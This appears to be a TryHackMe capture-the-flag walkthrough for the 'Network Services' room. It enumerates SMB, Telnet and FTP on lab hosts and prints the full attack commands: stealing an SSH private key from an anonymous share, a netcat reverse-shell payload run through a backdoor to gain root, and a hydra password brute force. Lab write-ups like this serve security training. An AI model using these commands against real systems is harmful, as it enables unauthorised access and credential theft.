
Overview

This is a walkthrough of the TryHackMe room "Network Services".

Task2

Q1.What does SMB stand for?

A.Server Message Block

Q2.What type of protocol is SMB?

A.response-request

Q3.What do clients connect to servers using?

A.TCP/IP

Q4.What systems does Samba run on?

A.Unix

Task3

Q1.Conduct an nmap scan of your choosing, How many ports are open?

Run a port scan with nmap.

$ nmap 10.10.47.64                                     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-19 09:08 EDT
Nmap scan report for 10.10.47.64
Host is up (0.24s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 45.70 seconds

The scan found three open ports.

A.3

Q2.What ports is SMB running on?

The port scan results show the SMB ports.

139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

A.139/445

Q3.Let's get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name?

Enumerate the SMB information with enum4linux.

$ enum4linux -a 10.10.47.64

The workgroup name is found in the output.

Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            POLOSMB

A.WORKGROUP

Q4.What comes up as the name of the machine?

Hint.Look under OS information, it might be hard to spot!

As in Q3, the machine name is also found in the enum4linux output.

A.POLOSMB

Q5.What operating system version is running?

The OS information was obtained.

[+] Got OS info for 10.10.47.64 from srvinfo:                                                                        
        POLOSMB        Wk Sv PrQ Unx NT SNT polosmb server (Samba, Ubuntu)                                           
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03

A.6.1

Q6.What share sticks out as something we might want to investigate?

An interesting share name was also obtained.

        Sharename       Type      Comment
        ---------       ----      -------
        netlogon        Disk      Network Logon Service
        profiles        Disk      Users profiles
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (polosmb server (Samba, Ubuntu))

A.profiles

Task4

Q1.What would be the correct syntax to access an SMB share called "secret" as user "suit" on a machine with the IP 10.10.10.2 on the default port?

A.smbclient //10.10.10.2/secret -U suit -p 445

Q3.Does the share allow anonymous access? Y/N?

Anonymous login to the profiles share worked without a password.

$ smbclient //10.10.47.64/profiles -U anonymous
Password for [WORKGROUP\anonymous]:
Try "help" to get a list of possible commands.
smb: \>

A.Y

Q4.Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?

View the file with more "Working From Home Information.txt".

John Cactus,

As you're well aware, due to the current pandemic most of POLO inc. has insisted that, wherever 
possible, employees should work from home. As such- your account has now been enabled with ssh
access to the main server.

If there are any problems, please contact the IT department at it@polointernalcoms.uk

Regards,

James
Department Manager

A.John Cactus

Q5.What service has been configured to allow him to work from home?

The contents of Working From Home Information.txt show that it is the SSH service.

A.ssh

Q6.Okay! Now we know this, what directory on the share should we look in?

SSH keys and related files are located under the .ssh directory.

smb: \> ls
  .ssh                               DH        0  Tue Apr 21 07:08:23 2020

A..ssh

Q7.This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?

Hint.What is the default name of an SSH identity file?

SSH key authentication requires id_rsa, the private key file.

A.id_rsa

Q8.What is the smb.txt flag?

Download the id_rsa file.

smb: \.ssh\> get id_rsa

Change the file permissions.

$ chmod 600 id_rsa

The enum4linux enumeration revealed the username.

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\cactus (Local User)

Connect via SSH using the obtained private key.

$ ssh -i id_rsa cactus@10.10.47.64

The flag was obtained from /home/cactus/smb.txt.

/home/cactus/smb.txt
THM{smb_is_fun_eh?}

A.THM{smb_is_fun_eh?}

Task5

Q1.What is Telnet?

A.application protocol

Q2.What has slowly replaced Telnet?

A.ssh

Q3.How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?

A.telnet 10.10.10.3 23

Q4.The lack of what, means that all Telnet communication is in plaintext?

Hint.What does the modern internet use to communicate securely?

A.encryption

Task6

Q1.How many ports are open on the target machine?

Hint.Nmap won't scan all ports by default.

Run a port scan with Nmap.

$ nmap -Pn -T4 -p- 10.10.72.68                         
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-19 15:56 EDT
Nmap scan report for 10.10.72.68
Host is up (0.24s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT     STATE SERVICE
8012/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 1398.40 seconds

The open port was found.

A.1

Q2.What port is this?

Port 8012 was detected.

A.8012

Q3.This port is unassigned, but still lists the protocol it's using, what protocol is this?

The displayed fingerprint shows that it is TCP.

$ nmap -Pn -T4 -A -p 8012 10.10.230.47
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-20 07:33 EDT
Nmap scan report for 10.10.230.47
Host is up (0.24s latency).

PORT     STATE SERVICE VERSION
8012/tcp open  unknown
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: 
|_    SKIDY'S BACKDOOR. Type .HELP to view commands
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8012-TCP:V=7.94SVN%I=7%D=6/20%Time=6674137B%P=x86_64-pc-linux-gnu%r
SF:(NULL,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view\x20comm
SF:ands\n")%r(GenericLines,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20
SF:to\x20view\x20commands\n")%r(GetRequest,2E,"SKIDY'S\x20BACKDOOR\.\x20Ty
SF:pe\x20\.HELP\x20to\x20view\x20commands\n")%r(HTTPOptions,2E,"SKIDY'S\x2
SF:0BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view\x20commands\n")%r(RTSPReque
SF:st,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view\x20command
SF:s\n")%r(RPCCheck,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20v
SF:iew\x20commands\n")%r(DNSVersionBindReqTCP,2E,"SKIDY'S\x20BACKDOOR\.\x2
SF:0Type\x20\.HELP\x20to\x20view\x20commands\n")%r(DNSStatusRequestTCP,2E,
SF:"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view\x20commands\n")%
SF:r(Help,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view\x20com
SF:mands\n")%r(SSLSessionReq,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x
SF:20to\x20view\x20commands\n")%r(TerminalServerCookie,2E,"SKIDY'S\x20BACK
SF:DOOR\.\x20Type\x20\.HELP\x20to\x20view\x20commands\n")%r(TLSSessionReq,
SF:2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view\x20commands\n
SF:")%r(Kerberos,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view
SF:\x20commands\n")%r(SMBProgNeg,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HE
SF:LP\x20to\x20view\x20commands\n")%r(X11Probe,2E,"SKIDY'S\x20BACKDOOR\.\x
SF:20Type\x20\.HELP\x20to\x20view\x20commands\n")%r(FourOhFourRequest,2E,"
SF:SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view\x20commands\n")%r
SF:(LPDString,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view\x2
SF:0commands\n")%r(LDAPSearchReq,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HE
SF:LP\x20to\x20view\x20commands\n")%r(LDAPBindReq,2E,"SKIDY'S\x20BACKDOOR\
SF:.\x20Type\x20\.HELP\x20to\x20view\x20commands\n")%r(SIPOptions,2E,"SKID
SF:Y'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view\x20commands\n")%r(LAN
SF:Desk-RC,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view\x20co
SF:mmands\n")%r(TerminalServer,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP
SF:\x20to\x20view\x20commands\n")%r(NCP,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\
SF:x20\.HELP\x20to\x20view\x20commands\n");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.22 seconds

A.tcp
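The SF- block above is nmap's raw service fingerprint: the header names the port and transport (SF-Port8012-TCP), and each %r(...) entry records a probe name, the response length in hex, and the escaped response. The decoder below is an added example, not part of the walkthrough or of nmap; it takes a constructed copy of the first few probe lines from the output above, joins the SF: continuation lines, checks each response against its declared length and returns the port, protocol and per-probe banners.

```python
import re

# Constructed sample: the first probes of the nmap fingerprint quoted in this
# walkthrough, truncated after GetRequest (raw string keeps nmap's escapes).
SAMPLE_FINGERPRINT = r'''SF-Port8012-TCP:V=7.94SVN%I=7%D=6/20%Time=6674137B%P=x86_64-pc-linux-gnu%r
SF:(NULL,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view\x20comm
SF:ands\n")%r(GenericLines,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20
SF:to\x20view\x20commands\n")%r(GetRequest,2E,"SKIDY'S\x20BACKDOOR\.\x20Ty
SF:pe\x20\.HELP\x20to\x20view\x20commands\n");'''

HEADER_RE = re.compile(r"^SF-Port(\d+)-(TCP|UDP):V=([^%]*)%")
RESPONSE_RE = re.compile(r'%r\(([\w-]+),([0-9A-Fa-f]+),"((?:[^"\\]|\\.)*)"\)')
ESCAPE_RE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\(.)")

def _unescape(s):
    # Undo nmap's escaping: \xHH -> that byte, \n \r \t -> control char, \c -> c
    simple = {"n": "\n", "r": "\r", "t": "\t"}
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return simple.get(m.group(2), m.group(2))
    return ESCAPE_RE.sub(repl, s)

def parse_fingerprint(text):
    """Join the SF-Port/SF: lines and return port, protocol, nmap version and a
    probe-name -> decoded-response map. Raises ValueError when a response's
    declared hex length disagrees with the decoded text (corrupted paste)."""
    joined = ""
    for line in text.splitlines():
        if line.startswith("SF-Port"):
            joined += line
        elif line.startswith("SF:"):
            joined += line[3:]
    m = HEADER_RE.match(joined)
    if not m:
        raise ValueError("not an nmap SF fingerprint")
    responses = {}
    for probe, hexlen, raw in RESPONSE_RE.findall(joined):
        decoded = _unescape(raw)
        if len(decoded) != int(hexlen, 16):
            raise ValueError(f"length mismatch for probe {probe}")
        responses[probe] = decoded
    return {"port": int(m.group(1)), "proto": m.group(2),
            "version": m.group(3), "responses": responses}

def banners(text):
    """Distinct decoded responses; one entry means every probe got the same banner."""
    return sorted(set(parse_fingerprint(text)["responses"].values()))
```

A single distinct banner across every probe is the tell-tale of a service that ignores its input and greets everyone, which is why nmap could not match it to a known protocol.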

Q4.Now re-run the nmap scan, without the -p- tag, how many ports show up as open?

Without specifying all ports, no open ports were detected.

$ nmap -Pn -T4 10.10.72.68     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-19 16:31 EDT
Nmap scan report for 10.10.72.68
Host is up (0.24s latency).
All 1000 scanned ports on 10.10.72.68 are in ignored states.
Not shown: 1000 closed tcp ports (conn-refused)

Nmap done: 1 IP address (1 host up) scanned in 27.40 seconds

A.0

Q6.Based on the title returned to us, what do we think this port could be used for?

From the output, it is highly likely that this port is used for a backdoor.

PORT     STATE SERVICE VERSION
8012/tcp open  unknown
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe: 
|_    SKIDY'S BACKDOOR. Type .HELP to view commands

A.a backdoor

Q7.Who could it belong to? Gathering possible usernames is an important step in enumeration.

The output "SKIDY'S BACKDOOR" can be seen in the fingerprint.

A.Skidy

Task7

Q2.Great! It's an open telnet connection! What welcome message do we receive?

Hint.Remember, telnet is not running on its default port. Use your answer from task 6, question 2.

Connect with Telnet.

$ telnet 10.10.230.47 8012
Trying 10.10.230.47...
Connected to 10.10.230.47.
Escape character is '^]'.
SKIDY'S BACKDOOR. Type .HELP to view commands

On connecting, a message is displayed.

A.SKIDY'S BACKDOOR.

Q3.Let's try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)

According to .HELP, commands can apparently be executed with .RUN <command>, but running one returns no result.

.HELP: View commands
 .RUN <command>: Execute commands
.EXIT: Exit
.RUN ls

A.N

Q6.Now, use the command "ping [local THM ip] -c 1" through the telnet session to see if we're able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)

Capture packets with tcpdump on the Kali side.

$ sudo tcpdump ip proto \\icmp -i tun0

Send an ICMP packet from the target machine to Kali.

.RUN ping 10.6.55.144 -c 1

The packet arrived.

07:54:04.574920 IP 10.10.230.47 > 10.6.55.144: ICMP echo request, id 1266, seq 1, length 64
07:54:04.574947 IP 10.6.55.144 > 10.10.230.47: ICMP echo reply, id 1266, seq 1, length 64

A.Y

Q8.What word does the generated payload start with?

Generate a reverse shell payload with msfvenom.

$ msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R

The payload was generated.

mkfifo /tmp/dbrn; nc 10.6.55.144 4444 0</tmp/dbrn | /bin/sh >/tmp/dbrn 2>&1; rm /tmp/dbrn

A.mkfifo

Q9.What would the command look like for the listening port we selected in our payload?

Listen with Netcat.

$ nc -lvp 4444

A.nc -lvp 4444

Q11.Success! What is the contents of flag.txt?

Run the payload from earlier on the target machine.

.RUN mkfifo /tmp/dbrn; nc 10.6.55.144 4444 0</tmp/dbrn | /bin/sh >/tmp/dbrn 2>&1; rm /tmp/dbrn

A root shell was obtained.

whoami
root

The flag can be obtained from /root/flag.txt.

cat /root/flag.txt
THM{y0u_g0t_th3_t3ln3t_fl4g}

A.THM{y0u_g0t_th3_t3ln3t_fl4g}

Task8

Q1.What communications model does FTP use?

A.client-server

Q2.What's the standard FTP port?

A.21

Q3.How many modes of FTP connection are there?

There are two modes: active mode and passive mode.

A.2

Task9

Q1.How many ports are open on the target machine?

Run a port scan with nmap.

$ nmap -Pn -sC -A -T4 -sV -p- 10.10.218.201
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-20 08:15 EDT
Warning: 10.10.218.201 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.218.201
Host is up (0.28s latency).
Not shown: 65464 closed tcp ports (conn-refused), 70 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             353 Apr 24  2020 PUBLIC_NOTICE.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.6.55.144
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
Service Info: Host: Welcome

The correct answer is that two ports, 21 and 80, are open, but only 21 could be detected.

$ nmap -Pn -sC -A -T4 -sV -p 80 10.10.218.201
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-20 08:32 EDT
Nmap scan report for 10.10.218.201
Host is up (0.24s latency).

PORT   STATE  SERVICE VERSION
80/tcp closed http

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.70 seconds

Checking port 80 in a browser could not connect either.
Why is that?

A.2

Q2.What port is ftp running on?

The port scan results show FTP on port 21.

A.21

Q3.What variant of FTP is running on it?

It is running vsftpd.

A.vsftpd

Q4.What is the name of the file in the anonymous FTP directory?

Connect to FTP as anonymous.

$ ftp 10.10.218.201                   
Connected to 10.10.218.201.
220 Welcome to the administrator FTP service.
Name (10.10.218.201:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

A text file was found.

ftp> ls
229 Entering Extended Passive Mode (|||54218|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             353 Apr 24  2020 PUBLIC_NOTICE.txt

A.PUBLIC_NOTICE.txt

Q5.What do we think a possible username could be?

Viewing PUBLIC_NOTICE.txt lets us guess a username.

PUBLIC_NOTICE.txt
===================================
MESSAGE FROM SYSTEM ADMINISTRATORS
===================================

Hello,

I hope everyone is aware that the
FTP server will not be available 
over the weekend- we will be 
carrying out routine system 
maintenance. Backups will be
made to my account so I reccomend
encrypting any sensitive data.

Cheers,

Mike

A.mike

Task10

Q1.What is the password for the user "mike"?

Crack mike's password with hydra.

$ hydra -f -l mike -P /usr/share/wordlists/rockyou.txt 10.10.218.201 ftp -t 40

The password was identified.

[21][ftp] host: 10.10.218.201   login: mike   password: password

A.password

Q3.What is ftp.txt?

Log in to FTP with the obtained credentials.

$ ftp 10.10.218.201
Connected to 10.10.218.201.
220 Welcome to the administrator FTP service.
Name (10.10.218.201:kali): mike
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

The flag can be obtained from ftp.txt.

ftp.txt
THM{y0u_g0t_th3_ftp_fl4g}

A.THM{y0u_g0t_th3_ftp_fl4g}
